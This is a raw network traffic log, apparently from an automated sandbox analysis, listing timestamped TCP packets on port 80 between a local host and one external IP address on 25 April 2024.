Apr 25, 2024 22:47:46.730432987 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730448961 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730501890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730515003 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730535030 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730586052 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730601072 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730640888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730648994 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730664015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730684042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730737925 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730753899 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730776072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.730796099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730812073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.730845928 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.731760979 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.731847048 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.733674049 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733691931 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733716011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733731985 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733741045 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.733773947 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.733789921 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733804941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733844995 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.733871937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733885050 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733947039 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733961105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.733990908 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734016895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734030962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734066963 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734092951 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734107018 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734185934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734199047 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734244108 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734247923 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734258890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734277010 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734294891 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734344006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734364986 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734379053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734394073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.734395981 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.734424114 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739063025 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739078999 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739124060 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739227057 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739242077 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739283085 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739336014 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739360094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739398003 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739456892 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739471912 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739485025 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739500999 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739542007 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739557028 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739578009 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.739739895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.739780903 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.740911007 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.740927935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.740967035 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.958384037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.958471060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.958484888 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.958610058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.958698034 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.958882093 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959058046 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959072113 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959115982 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.959139109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959153891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959173918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.959739923 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.959788084 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960067987 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960083008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960118055 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960174084 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960187912 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960243940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960258961 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960278988 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960309029 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960320950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960335970 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960350990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960374117 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960408926 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960422993 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960450888 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960491896 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960505962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960530043 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960616112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960629940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960665941 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960724115 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960738897 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960752010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960758924 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960787058 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.960917950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960930109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.960985899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.961046934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.961059093 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.961091042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.961100101 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.961111069 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.961143970 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.965468884 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965481043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965514898 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.965528011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965539932 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965573072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.965662956 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965675116 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965722084 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.965800047 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965811014 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965843916 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.965966940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.965977907 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966020107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966036081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966048002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966073990 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966092110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966103077 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966137886 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966172934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966183901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966227055 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966310024 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966320992 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966353893 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966389894 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966403008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966437101 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966439009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966453075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966495991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966504097 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.966509104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.966545105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.969825983 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.969836950 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.969890118 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.969973087 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.969985962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970030069 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.970124006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970134974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970165014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.970206022 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970216990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970257998 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.970289946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970302105 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.970340014 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.971801043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.971844912 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:46.971920967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.971932888 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:46.971963882 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.187308073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187335968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187346935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187454939 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187664032 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.187819958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187832117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.187880039 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.188000917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.188014030 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.188047886 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.188076973 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.188685894 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.188699007 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.188736916 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189078093 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189090967 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189127922 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189208984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189270020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189435959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189448118 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189490080 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189542055 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189585924 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189768076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189780951 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189817905 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189831972 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189845085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189873934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189889908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189903975 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189908028 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189938068 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.189960957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.189973116 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190006018 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190030098 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190051079 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190063000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190097094 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190144062 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190190077 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190201998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190212965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190244913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190263987 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190308094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190320015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190361023 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190444946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190458059 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190490961 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190515995 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190531969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190543890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190582991 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190628052 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190671921 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.190697908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.190743923 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194013119 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194026947 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194084883 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194207907 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194220066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194257021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194386959 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194399118 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194421053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194422960 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194452047 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194572926 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194583893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194614887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194658041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194670916 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194694042 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194720030 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194725990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194737911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194763899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194796085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194808006 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194838047 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194880962 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194891930 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.194916010 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.194942951 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.195137024 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195179939 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.195307016 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195348024 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.195391893 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195403099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195430040 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.195458889 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195493937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.195575953 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195588112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.195616961 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.198633909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198677063 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198688030 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198702097 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.198731899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.198791981 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198803902 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198834896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.198893070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198905945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.198930979 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.198957920 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.199100971 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.199139118 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.200696945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.200711012 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.200721979 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.200735092 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.200833082 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.200884104 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.201925039 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.416749001 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.416771889 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.416784048 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.416795969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.416901112 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.416954994 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.417021990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.417035103 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.417068005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.417083979 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418355942 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418370008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418401957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418482065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418493032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418531895 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418626070 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418638945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418667078 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418721914 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418735981 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418749094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.418761969 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418780088 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.418967009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419329882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419342041 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419373989 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.419399023 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419409990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:47.419431925 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:47.419492006 CEST	80	49706	45.95.11.217	192.168.2.5
